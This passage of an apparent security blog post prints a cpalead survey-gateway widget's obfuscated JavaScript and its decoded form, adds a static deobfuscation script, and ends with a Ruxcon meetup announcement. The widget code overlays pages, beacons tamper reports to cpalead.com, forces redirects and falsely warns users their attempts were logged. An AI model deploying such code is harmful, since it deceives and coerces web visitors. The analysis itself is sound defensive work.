106=[\'200%297\'];4(!2.5(\'11\')){214(7)}12{4(2.5(\'11\').3.21=\'42\'){2.5(\'11\').3.21=\'55\';92=76(7,\'18\')/100;2.5(\'11\').3.120="118(18="+92+")";2.5(\'11\').3.18=92}}6 51=96();141();140(0);150(0);6 26=2.5(\'35\');26.3.21=\'55\';26.3.33=\'47\';26.3.28=\'121\';26.3.34=\'0\';26.3.202=\'0\';26.3.197=\'285\';26.3.17=\'100%\';6 144=0;90(6 8=0;8<106.97;8++){4(106[8]==7||106[8]==166(7)){6 157=76(7,\'66\');4(157==1){2.5(\'129\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/160-62/160-280-262-261.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}12{2.5(\'129\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/281/264.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}6 144=1;132=8;260}}4(144==0){2.5(\'129\').53=\'\';2.5(\'116\').53=\'\'}26.3.23=(51[1]+\'130\');48("219(\'"+7+"\');",169);2.5(\'24\').3.21=\'55\';131=75;48("156();",255)}9 171(){119=119-1;2.5("256").53=119;4(119<=0){257()}12{48("171()",172)}}2.16(\'<3 258="36/266">#11{27-32: #155; 120:118(18=80); 18: 0.80; -267-18: 0.80;}\');2.16(\'#35 14 {27:42;52-210:138;32:#206;36-208:42}\');2.16(\'#35 91 {93: 162;}\');2.16(\'#35 14:276 {27:42;52-210:138;32:#206;36-208:275}</3>\');2.16(\'<10 13="35" 3="21:42; 36-39: 38; 277-23: 138; ">\');2.16(\'<10 13="129" 39="38" 3="28: 121; 17: 
100%; 31-29: 115;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 13="116" 39="38" 3="28: 121; 17: 100%; 31-29: 125;">\');2.16(\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;">\');2.16(\'</10>\');2.16(\'</10>\');2.16(\'<10 3="278: 152 279 162; 27: 25; 23: 274; 31-29: 273;">\');2.16(\'<64 17="100%" 23="269" 13="24" 44="" 268="75" 270="0" 3="28: 54; 23: 272; 205-65: 86; 205-271: 86; 27-32: 25; 31-29: 254; " 259="265"></64>\');2.16(\'</10></10>\');',10,304,'||document|style|if|getElementById|var|gateid|i|function|div|aijvqsnovujrsfoj3|else|id|a|dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5|write|width|opacity|window|body|display|em|height|wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831|transparent|zcpkmswwmxlgjzbue41a138882143252732d893|background|position|index||z|color|visibility|top|wzjyzgbhqzohhlhvef8426b5a89be2|text|http|center|align||onoroff|none|cpalead|src||com|visible|setTimeout|object_tags||arrayPageSize|font|innerHTML|relative|block||guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9|b|bodyloadtime|offsetHeight|d|widget|right|iframe|x|donation_widget|dpjfszjhzduviwkn424c2477e2d48|c|12px|size|www|php|setAttribute|documentElement|true|getWidgetSetting|mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a|iframe_tags|ytndhhmwdjexjqej106a67d2||getElementsByTagName|pub|42138|x6F|false|hidden|wmode|gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62|clientHeight|for|img|opacity_setting_moz|border|static||getPageSize|length|clientWidth|||alt|cbtonfugwctexmjdff8bd9e3648ab7|images|innerHeight|pointer|closebuttons|onclick|popup_delay|overlay|not|Close|cursor|func|checkForBody|11863866|arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c|Widget|alpha|countdown|filter|absolute|135px|settings|widgetJSON|11863936|172px|452px|onload|lpepmphihufelzdd28c18f8093587772fdd38f|px|ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6|found|oldonload|x61||x6C|self|normal|pn|jrbxaafwxpcz
sjiy0a8801c687f76b5f6d210b99a0250a37|dontscroll|opacity_setting_ie|_0x96be|has_closebtn|tamper|new|hasfirebug|reason|mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e|mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22|ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69|72px|return|_0xb500|000|hienslexztaecvon972b4c6959457b72d8591114abeb305d|is_donation|invalid|video_bucket|rice|appendChild|0px|styles|sgfplcetedjsqmbvbbcb115|x65|escape|x63|x72|500|video_controller|secondpass|1000|Image|tampertype|xwwjxyvbmsrjfpud17e9cae225420|innerWidth|yecqogvnndwlktmu|adixdgozwczhuvaf6e84b|png|pageWidth|pageHeight|gif|scrollHeight|scrollMaxY|firebug|225px|x74|console|settingname||secondclose|blank7|158px|lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73|navigator|nx|zIndex|appName|myGatewayStart|NzMxNTM|insertBefore|left||x69|overflow|fff|item|decoration|ems|weight|embeds|Microsoft|location|createOverlay|Explorer|x6E|url|replace|loadGatewayIframe|Internet|closebtn|ODA1OTE|scrollMaxX|OTM5ODQ|NzM5NTQ|startGateway|this|disable|offsetWidth|to|unescape|scrollWidth|removeChild|catch|e|embed|null|object|has|been|try|Your|logged|parentNode|countdownStarted|attempt|typeof|isloaded|gmgqvtjawhodlboj8b0d5f2c|bodyexisted|addWidgetLoadEvent|nextSibling|createElement|11863886|5000|closelink|riunpfcaxfcggjhpf|type|scrollbars|break|button|close|Array|close_btn|NO|css|moz|allowtransparency|640|frameborder|y|640px|11863881|482px|underline|hover|line|margin|auto|skin|help|nostyle|test|x64|11863846|contentWindow|x66|blank|about|adblock|href|surveysforcharity|org|thankyou|mygateway_iframe_loader|x68|3D|referrer|ref||11863836|subid|firstChild'.split('|'),0,{}))
Which gives us more obfuscated javascript:
var widgetJSON={"settings":[{"id":"OTM5ODQ=","opacity":"99","donation_widget":"0"},{"id":"NzMxNTM=","opacity":"50","donation_widget":"0"},{"id":"NzM5NTQ=","opacity":"30","donation_widget":"0"},{"id":"ODA1OTE=","opacity":"95","donation_widget":"0"}]};function getWidgetSetting(gateid,settingname){for(var x=0;x<widgetJSON.settings.length;x++){if(widgetJSON.settings[x].id==unescape(gateid)){return widgetJSON.settings[x][settingname]}}}var popup_delay='';var countdownStarted=false;var isloaded=true;var ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=false;var cbtonfugwctexmjdff8bd9e3648ab7=false;var bodyexisted=false;var bodyloadtime=0;var mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=0;var xwwjxyvbmsrjfpud17e9cae225420='ytndhhmwdjexjqej106a67d2';var gmgqvtjawhodlboj8b0d5f2c='Your attempt to disable this widget has been logged.';function addWidgetLoadEvent(func){var oldonload=window.onload;if(typeof window.onload!='function'){window.onload=func}else{window.onload=function(){if(oldonload){try{oldonload()}catch(e){}}if(func){func()}}}}function checkForBody(gateid){var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);if(gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62==null){bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}else{myGatewayStart(gateid)}}function startGateway(gateid){if(popup_delay>0){bodyloadtime=bodyloadtime+popup_delay+'000';setTimeout("checkForBody('"+gateid+"');",popup_delay+'000')}else{bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}}function yecqogvnndwlktmu(onoroff){iframe_tags=document.getElementsByTagName('iframe');for(i=0;i!=iframe_tags.length;i++){if(iframe_tags[i].id!='wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831'){if(onoroff==0){iframe_tags[i].style.visibility='hidden'}if(onoroff==1){iframe_tags[i].style.visibility='visible'}}}}function jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(onoroff){var 
embeds=document.getElementsByTagName('embed');for(var ems=document.embeds,i=0,em;em=ems[i];i++){if(em.id!='video_controller'&&em.id!='video_bucket'){if(onoroff==0){if(navigator.appName=='Microsoft Internet Explorer'){em.setAttribute('wmode','transparent');em.style.visibility='hidden'}else{em.setAttribute('wmode','transparent');var nx=em.nextSibling,pn=em.parentNode;pn.removeChild(em);pn.insertBefore(em,nx)}}if(onoroff==1){em.setAttribute('wmode','window');if(navigator.appName=='Microsoft Internet Explorer'){em.style.visibility='visible'}}}}}function mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(onoroff){object_tags=document.getElementsByTagName('object');for(i=0;i!=object_tags.length;i++){if(object_tags[i].id!='video_controller'&&object_tags[i].id!='video_bucket'){if(onoroff==0){object_tags[i].setAttribute('wmode','transparent');object_tags[i].style.visibility='hidden'}if(onoroff==1){object_tags[i].style.visibility='visible';object_tags[i].setAttribute('wmode','window')}}}}function getPageSize(){var c,d;if(window.innerHeight&&window.scrollMaxY){c=window.innerWidth+window.scrollMaxX;d=window.innerHeight+window.scrollMaxY}else if(document.body.scrollHeight>document.body.offsetHeight){c=document.body.scrollWidth;d=document.body.scrollHeight}else{c=document.body.offsetWidth;d=document.body.offsetHeight}var a,b;if(self.innerHeight){a=document.documentElement.clientWidth?document.documentElement.clientWidth:self.innerWidth;b=self.innerHeight}else if(document.documentElement&&document.documentElement.clientHeight){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else if(document.body){a=document.body.clientWidth;b=document.body.clientHeight}pageHeight=d<b?b:d;pageWidth=c<a?c:a;return arrayPageSize=new Array(pageWidth,pageHeight,a,b)}function dontscroll(){var 
arrayPageSize=getPageSize();if((arrayPageSize[1]-document.getElementById('aijvqsnovujrsfoj3').style.height.replace("px",""))>30){document.getElementById('aijvqsnovujrsfoj3').style.height=(arrayPageSize[1]+'px')}if(mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e==0){setTimeout("dontscroll();",500)}}function mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(gateid,adixdgozwczhuvaf6e84b){if(adixdgozwczhuvaf6e84b!=xwwjxyvbmsrjfpud17e9cae225420){top.location.href='http://www.cpalead.com/adblock.php?pub=42138'}var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.getElementById('aijvqsnovujrsfoj3');var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(1);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(1);yecqogvnndwlktmu(1);mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=1;cbtonfugwctexmjdff8bd9e3648ab7=true;if(getWidgetSetting(gateid,'donation_widget')==1&&secondclose!=true){dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.filter="alpha(opacity=0)";dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.opacity="0.0";document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='http://www.surveysforcharity.org/thankyou-overlay.php';secondclose=true}else{zcpkmswwmxlgjzbue41a138882143252732d893.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='about:blank';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='none'}return false}function guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9(tampertype){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){if(window.console&&window.console.firebug){var hasfirebug=1}else{var hasfirebug=0}dpjfszjhzduviwkn424c2477e2d48=new 
Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper.php?pub=42138&firebug="+hasfirebug+"&tamper="+tampertype;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);sgfplcetedjsqmbvbbcb115()}}function ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69(reason){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){dpjfszjhzduviwkn424c2477e2d48=new Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper-test.php?pub=42138&reason="+reason;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73('http://www.cpalead.com/nostyle.php?pub=42138')}}function hienslexztaecvon972b4c6959457b72d8591114abeb305d(){if(!document.getElementById('aijvqsnovujrsfoj3')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-not-found')}else if(!document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-not-found')}else if(!document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-found')}else if(document.getElementById('aijvqsnovujrsfoj3').style.width!="100%"||document.getElementById('aijvqsnovujrsfoj3').style.display!="block"||document.getElementById('aijvqsnovujrsfoj3').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-styles')}else if(document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.width!="100%"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.display!="block"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-styles')}else 
if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display!="block"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-visible')}if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight<=300&&document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight!=0){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('iframe-height-invalid-'+document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight)}else if(document.getElementById('aijvqsnovujrsfoj3').offsetHeight<=100&&document.getElementById('aijvqsnovujrsfoj3').clientHeight<=100){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('overlay-height-invalid-'+document.getElementById('aijvqsnovujrsfoj3').offsetHeight+'-'+document.getElementById('aijvqsnovujrsfoj3').clientHeight)}setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d()",1000)}function sgfplcetedjsqmbvbbcb115(){var _0x96be=["\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window[_0x96be[1]][_0x96be[0]]()}function lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73(url){var _0xb500=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];top[_0xb500[1]][_0xb500[0]]=url}function loadGatewayIframe(gateid){document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').contentWindow.location.replace('http://www.cpalead.com/mygateway_iframe_loader.php?pub=42138&subid=203.45.56.190&gateid='+gateid+'&ref='+escape(document.referrer)+'')}function createOverlay(gateid){var arrayPageSize=getPageSize();var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);var 
dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.createElement("div");dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.setAttribute('id','aijvqsnovujrsfoj3');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.position='absolute';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.top='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.left='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.zIndex='11863836';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.width='100%';gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.insertBefore(dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5,gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.firstChild);opacity_setting_ie=getWidgetSetting(gateid,'opacity');opacity_setting_moz=opacity_setting_ie/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_ie+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz;dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.height=(arrayPageSize[1]+'px');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='block';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.visibility='visible'}function myGatewayStart(gateid){var closebuttons=['NzMxNTM%3D'];if(!document.getElementById('aijvqsnovujrsfoj3')){createOverlay(gateid)}else{if(document.getElementById('aijvqsnovujrsfoj3').style.display='none'){document.getElementById('aijvqsnovujrsfoj3').style.display='block';opacity_setting_moz=getWidgetSetting(gateid,'opacity')/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_moz+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz}}var arrayPageSize=getPageSize();dontscroll();jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(0);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(0);var 
zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');zcpkmswwmxlgjzbue41a138882143252732d893.style.display='block';zcpkmswwmxlgjzbue41a138882143252732d893.style.visibility='visible';zcpkmswwmxlgjzbue41a138882143252732d893.style.position='absolute';zcpkmswwmxlgjzbue41a138882143252732d893.style.top='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.left='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.zIndex='11863846';zcpkmswwmxlgjzbue41a138882143252732d893.style.width='100%';var has_closebtn=0;for(var i=0;i<closebuttons.length;i++){if(closebuttons[i]==gateid||closebuttons[i]==escape(gateid)){var is_donation=getWidgetSetting(gateid,'donation_widget');if(is_donation==1){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/rice-widget/rice-skin-close-button.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}else{document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a 
onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/help/close_btn.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}var has_closebtn=1;found=i;break}}if(has_closebtn==0){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML=''}zcpkmswwmxlgjzbue41a138882143252732d893.style.height=(arrayPageSize[1]+'px');setTimeout("loadGatewayIframe('"+gateid+"');",500);document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='block';ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=true;setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d();",5000)}function secondpass(){countdown=countdown-1;document.getElementById("closelink").innerHTML=countdown;if(countdown<=0){riunpfcaxfcggjhpf()}else{setTimeout("secondpass()",1000)}}document.write('<style type="text/css">#aijvqsnovujrsfoj3{background-color: #000; filter:alpha(opacity=80); opacity: 0.80; -moz-opacity: 0.80;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a {background:none;font-weight:normal;color:#fff;text-decoration:none}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 img {border: 0px;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a:hover {background:none;font-weight:normal;color:#fff;text-decoration:underline}</style>');document.write('<div 
id="wzjyzgbhqzohhlhvef8426b5a89be2" style="display:none; text-align: center; line-height: normal; ">');document.write('<div id="lpepmphihufelzdd28c18f8093587772fdd38f" align="center" style="position: absolute; width: 100%; z-index: 11863866;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div id="arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c" align="center" style="position: absolute; width: 100%; z-index: 11863936;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div style="margin: 72px auto 0px; background: transparent; height: 482px; z-index: 11863881;">');document.write('<iframe width="100%" height="640" id="wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831" src="" allowtransparency="true" frameborder="0" style="position: relative; height: 640px; overflow-x: hidden; overflow-y: hidden; background-color: transparent; z-index: 11863886; " scrollbars="NO"></iframe>');document.write('</div></div>');
The next steps would be far too time-consuming for me given the glaringly obvious conclusion you can draw by googling for cpalead or http://www.cpalead.com/mygateway_iframe_loader.php. In conclusion, there isn't anything new here. The techniques aren't very advanced, but good enough to keep the general public ignorant of what's really going on. I did find the Firebug / anti-tamper code used in the last bit of JS interesting, but I'm sure that malware analysts have seen it thousands of times before.
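As an added example (this is not part of the original post and not the cpalead code itself), here is a small Node.js script that does the analyst's first pass over the captured widget without executing any of it: it decodes the hex-escaped string arrays so that window[_0x96be[1]][_0x96be[0]]() reads as window.location.reload(), and it lists the cpalead.com endpoints the tamper beacons and forced redirects go to. The snippets in SAMPLE_SOURCE are copied verbatim from the script above; the function names and regular expressions are my own.

```javascript
// Added example, not code from the original post or from the cpalead widget it
// dissects. Static first pass over the captured script: decode the "\xNN"
// string arrays and pull out the endpoints, with no eval and no DOM.

// Constructed input: lines copied verbatim from the captured script above.
// (JS string escaping doubles the backslashes; the source text has "\x72".)
const SAMPLE_SOURCE = [
  'function sgfplcetedjsqmbvbbcb115(){var _0x96be=["\\x72\\x65\\x6C\\x6F\\x61\\x64","\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E"];window[_0x96be[1]][_0x96be[0]]()}',
  'function lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73(url){var _0xb500=["\\x68\\x72\\x65\\x66","\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E"];top[_0xb500[1]][_0xb500[0]]=url}',
  'dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper.php?pub=42138&firebug="+hasfirebug+"&tamper="+tampertype;',
  'dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper-test.php?pub=42138&reason="+reason;',
  "lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73('http://www.cpalead.com/nostyle.php?pub=42138')",
].join('\n');

// Turn a literal "\x72\x65\x6C\x6F\x61\x64" into "reload" without evaluating it.
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9A-Fa-f]{2})/g, (_, hh) => String.fromCharCode(parseInt(hh, 16)));
}

// Find every `var _0xNNNN=["...","..."]` declaration and return
// { name: [decoded strings] }. Array bodies in this script contain no ']'.
function collectStringArrays(src) {
  const arrays = {};
  const decl = /var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([^\]]*)\]/g;
  let m;
  while ((m = decl.exec(src)) !== null) {
    const items = [];
    const str = /"((?:\\.|[^"\\])*)"/g;
    let s;
    while ((s = str.exec(m[2])) !== null) items.push(decodeHexEscapes(s[1]));
    arrays[m[1]] = items;
  }
  return arrays;
}

// Rewrite obj[_0xNNNN[i]] as obj.name using the decoded arrays. Adjacent
// matches resolve chained accesses like window[a[1]][a[0]] in one pass.
function resolveIndexedAccess(src, arrays) {
  const ref = /\[(_0x[0-9a-fA-F]+)\[(\d+)\]\]/g;
  return src.replace(ref, (whole, name, idx) => {
    const arr = arrays[name];
    if (!arr || arr[idx] === undefined) return whole; // unknown array: leave untouched
    return '.' + arr[idx];
  });
}

// Unique external endpoints (beacon images and forced navigation), query
// strings stripped so the per-publisher parameters do not fragment the list.
function extractEndpoints(src) {
  const urls = src.match(/https?:\/\/[^"'\s?]+/g) || [];
  return [...new Set(urls)].sort();
}

function deobfuscate(src) {
  const arrays = collectStringArrays(src);
  return {
    arrays,
    readable: resolveIndexedAccess(src, arrays),
    endpoints: extractEndpoints(src),
  };
}

// Usage: print the decoded arrays, the readable source and the endpoint list.
const report = deobfuscate(SAMPLE_SOURCE);
console.log(JSON.stringify(report.arrays));
console.log(report.readable);
console.log(report.endpoints.join('\n'));
```

In the portion of the script shown above, the string-array indirection hides only the two calls that punish tampering: a page reload when the overlay or widget styles have been changed, and a redirect of the top window to nostyle.php when the iframe or overlay height looks wrong. Everything else relies on randomised identifiers rather than encoded strings, so decoding those two arrays is enough to read the whole anti-tamper loop.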
I am presenting at this month's Ruxcon Monthly Meetup.

Date: Friday, 25th June
Time: 6:00PM
Location: RMIT University, City Campus
https://my.rmit.edu.au/portal/page/portal/RMITPortal/campusmaps?dsize=max
Room: Building 8, Level 9, Room 42 (008.09.042)

RMIT Building 8 entrance is off Swanston Street (just past Swanston and
La Trobe). Please take the lift to Level 9 and make your way to Room 42.
We will have directions posted up in the building.

Presentations
=============

Unsanitary Web Activities - Tim Noise (MovingData)

In the land of the internet, web developers are constantly rolling out
new applications and letting them free into the Internet, many with
little knowledge or experience in security. They assume the users will
provide data in a manner they expect. This talk will cover webapp
security basics and commonplace attacks, showing you the effect this
oversight can have, and how to prevent it.

Pownage Coquillage: Real World Tales From The Trenches - Sash Biskup
(Stratsec)

In this talk the presenter will discuss various security incidents he
has been involved in during the course of his career. Starting with old
school bof through to modern day malware and blackmail. This isn't a
deep technical analysis of each incident but an overview of the
characteristics of each of the attacks and what the repercussions were to
the organisation or individual.

Static analysis with Graudit - Eldar Marcussen

Graudit is a rough audit tool, that can be used to find vulnerabilities
in source code (C, ASP, .NET, JSP, PHP, Perl and Python). In this
presentation I will show how to get the most out of graudit.

This weblog is licensed under a Creative Commons License.